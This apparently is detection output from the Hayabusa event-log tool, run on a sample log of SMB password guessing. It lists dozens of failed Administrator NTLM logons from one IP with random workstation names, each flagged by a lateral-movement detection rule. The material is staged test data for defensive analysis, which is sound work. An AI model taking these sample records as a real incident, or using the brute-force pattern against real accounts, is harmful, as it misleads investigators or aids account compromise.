NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.025 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2JSMrPoucOR0nzlD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.064 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jr4w4uoF2DVZ5n9x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.104 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v319oZIaOBpuf542 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.151 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GNRTL9BLlGWMx6dA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zHlDIOZ9B5uY8Rzz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:04.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dr2bvAue8mr5kagX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pXBds9GoXr6IZUfp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.327 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aLYuegjXO18lo342 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.367 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: To3MMEEvNXKNjKHT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N0HCToTmh3ESGBYt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.455 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nNvBueVo3ANNmSSN : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mVWOoAG5ermGL2Gl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W7QYJUNPm5b4jprh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.590 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PHllwNJvpH3P97cp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tfT8GtafHGYMlkMf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nab7wtZfBVkcynsa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:04.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VHiijj7sT9nyqxii : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.780 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v06kkhqYNOyEHx2c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.820 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WSTDX16YK5Zgkjxo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u6QWEyTrpndCagP0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.914 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7iCaXa5SR5IHJnQA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:04.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DNZhcPd1JaNFZMYG : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LeOIg10KS60QplWz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.036 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: um3Nwo2doDbKJJvz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.150 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JuoqbUwc2Nth1xlH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.199 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WF8zKIbeboTLLkC6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kSyKc8igfuYLMekV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:05.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LHog0TdOci9CCKBa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R5ilFaQlemZUSNun : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JOJnv9vFdqr2VSQC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rXaoVN7FvJ5rRDUF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kaFCT5QYFfmJpEC1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kOdVfL4XUTLp60tC : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wFQSXjz0JTlkwpBu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.634 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sgAVlnENp6IzRRDr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JLkeKKFVP5vJjPtl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.751 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EqLXdGmr45vGpu3E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m7uTpMLqPgenJdRb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:05.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FQn7NqRzpGtjQdfv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8F8EZLHQtEWkeob1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5joxW81M9vcAfbJw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:05.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iMfmQF3xsaV5SQVZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.040 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QQe9VL8eeco0SdPW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MnMbxQEuczrnMLKc : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.137 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3DWOiTIp6JQLq9Vz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E1ORteg467kiFxmD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.216 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EoVhHZ2lkyAEx0w9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IMSqYaVVGR5v3bXr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.298 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hEEJ05nL0lyatWKL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:06.349 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SgrcS1NqwVJSEv31 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.395 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CCNTu1A6c6myngXd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.434 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YLx5Hv5GmdvsO9SE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VtS3KUkTVoAWGqbW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.512 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7DxfDEwc6ykrmddu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m8yKyocZwOY574pe : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JfdmcsxnDHRxJYAA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: euxBOcdse8NjSzTd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dw7RZh5jKuRcM1xw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zIyozsYA1Mn27gl7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.786 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vhJopROjHZi6T8aF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:06.822 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QZ6XuZO6fIMg52tV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.870 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tvAYEepvDwz93ezW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.919 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6Er95vLjet49OmSQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:06.960 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OKkMGZ5on5L26cip : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dp5dq3YYmmLxperL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: klkWqfYoNQQHRISX : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q0EekPO3q6qRfq3i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gfG1x6sL4Aqlj7TK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: owSUehMmDEhijkfl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J3xBPT5WiuvmPZHe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gIufEPz8FBVd5yKe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:07.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6Blruxd110NvZjof : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0VsPitzItsjU3Y59 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.460 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HEq6vk4nTe3weSOP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:07.507 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lE8kvmcQtCmlsqtT : IP Address: 192.168.198.149 : AuthPackage: 